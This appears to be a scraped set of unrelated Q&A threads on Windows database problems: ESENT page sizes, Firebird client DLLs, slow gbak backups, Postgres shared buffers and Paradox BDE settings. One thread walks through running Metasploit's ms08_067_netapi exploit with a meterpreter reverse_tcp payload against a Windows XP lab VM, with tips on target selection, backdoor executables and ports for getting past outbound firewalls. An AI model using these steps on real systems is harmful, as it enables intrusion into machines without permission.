Opening edb-database with page size more than 8192 on Vista - edb

I use
JetGetDatabaseFileInfo(db_name, &db_page_size, sizeof(db_page_size),JET_DbInfoPageSize);
JetSetSystemParameter(NULL, NULL, JET_paramDatabasePageSize, db_page_size, NULL);
to set the same page size of as a database have.
There is a database with page size == 32768. On windows 7 this code works perfectly. On Windows Vista JetSetSystemParameter returns JET_errInvalidParameter. Is there any way to open a database with page size of over 8192 on Windows Vista?

No. 32k pages were added in Windows 7.
Even if the database had 8k pages, there are other Windows 7 changes that would make the Vista esent.dll unable to open the Win7-based database file.
If it's just for your own use, you can copy the Win7 esent.dll to a Vista machine. But I don't believe that it's permissible to redistribute esent.dll with your program.


Cannot connect Firebird in IBexpert

I have installed Firebird 3.0.2 (x64) and IBExpert 2018.12.15.1.
I'm trying to create a Firebird DB on IBExpert but everytime getting this error:
Unsuccessful execution caused by system error that does not preclude successful execution of subsequent statements.
Error loading plugin Engine12.
Module C:\Program Files\Firebird\Firebird_Server\plugins/Engine12 exists but can not be loaded.*
My configuration:
Local, XNet (FB3)
Connection string
Client Library File
C:\Program Files\Firebird\Firebird_Server\WOW64\fbclient.dll
Page size
SQL Dialect 3
How to solve this problem?
This happens to me when I select the firebird fbclient dll from the following location
C:\Program Files\Firebird\Firebird_3_0\WOW64\fbclient.dll
However if I instead (against all sanity and reason) chose what I think ought to be a 64 bit dll, from c:\windows\system32, it works.
ie, client choice:
Now it might seem logical to some readers that system32 could contain a 32 bit dll, but actually almost every dll in there, and probably EVERY dll in there SHOULD be 64 bit, on windows 64 bit systems. However I am guessing that whatever is in there must be a 32 bit fbclient.dll in the main windows 10 system directory.
Microsoft made a now ancient but at the time, kind of odd decision that c:\windows\system32 will be full of 64 bit stuff on Windows XP 64 bit, and has kept it that way. It appears to me there's something wrong with Firebird 3.0.4's installer team's decisions.

Backup/Restore of Firebird SQL Server 3.0.2 is slow on Windows Server 2016

I have installed Firebird 3.0.2 SQL database on my Windows Server 2016. No other software has been installed yet.
I'm using Superserver mode and an SSD drive.
When I just copy my database file of size 6 GB, it is done in 20-30 seconds (same disk).
But when I execute backup it takes 20-30 minutes. Restore is about the same amount of time. Together 40-60 minutes.
And there is strange thing: backup/restore process (gbak.exe) does not use full power of CPUs and HDD. It is using only ~20% . I don't understand why.
I think it should be something in configuration right? But I kept everything in default values.
Very important thing: I am new in Windows Server 2016 so I have no idea what I am doing.
Any ideas?
I found out that it is about configuration of Power Options.
Windows Server 2016 is after installation set for Balanced Power Plan.
I changed it to High performance and results are highly better. (backup drops from 30 minutes to 6 minutes)
More details you can find here:
To find the restore bottleneck in Firebird 3 you should add the detail protokoll option:
-v -stat TDRW Filename
-v (Verbose output of what GBAK is doing)
-stat (Runtime statistics in its verbose output)
T (Total time)
D (Total delta)
R (Page reads)
W (Page writes)
Have a look to the GBAK option
-service localhost:service_mgr
it is a speed demon :-)

Metasploit error, stops at attempting to trigget vulnerability for ms08_067_netapi exploit

I am trying to hack my own webcam. My host PC is Linux Mint 17. The target is VM instance of Windows XP SP3.
Target IP -
My Host IP -
Problem is when i execute exploit, it says attempting to trigget the vulnerability and nothing happens.
Attached is the snapshot: Img link
Here are the commands i am using:
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
Looks like you want to open a metertpreter session. Assuming this, here is one suggestion.....
Try to issue "show targets" commands and set your O.S as target, explicitly.
eg:show targets
output might be something like....
Exploit targets:
Id Name
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
then issue command as....
set target 8
Then issue "exploit" command.
Then check if meterpreter console opens.
in most of the time windows targets are patched and you can not attack them with this exploit. but you can use some client side exploit like:
browse base exploit
backdoor executable
and ...
You might try different LPORT. Try using LPORT 80 which usually works. If it does not try LPORT 443. This may be because of Outbound firewall rules.

Performace tuning of Postgres server

I have Postgres 9.1 installed on Windows server 2008 R2 machine having 32 GB RAM. For performance tuning i have to update the shared buffer to 8 GB. But after updating the shared buffer to 8 GB in postgresql.conf file i am not able to start the service. its giving error message "The Postgresql-9.1 - Postgresql server 9.1 serviceon local computer started and then stopped. Some servcies stop automatically if they are not in use by other servcies or programs".
Any one can suggest how can i update the shared buffer. your suggestions are highly appreciated...

Running 2 applications that read Paradox tables fails on Windows 7 (32 bits)

I have an application written in Delphi 5 which uses a Paradox ".db" database. My application makes a call to a set of scripts written in Perl and uses ODBC to access the DB tables to collect data and generate XML files.
Everything works fine on my PC (Win 7, 64 bits), but not on a 32-bit Win 7 PC. The Perl script fails and I get the following error:
-1305[Pilote ODBC Paradox] le moteur de base de données microsoft Jet n'a pas pu
trouvé l'objet xxxx.
When I close the Delphi application and run the scripts manually it works fine.
For those who may faces the problem, i have got the solution. i changed the configuration of BDE as follow: SHAREDMEMSIZE = 1024. MAXBUFFSIZE = 2048. It is recomanded that MAXBUFFSIZE = 2* SHAREDMEMSIZE. And to allow running multiple Applications using the BDE to set the SHAREDMEMSIZE less than 2048.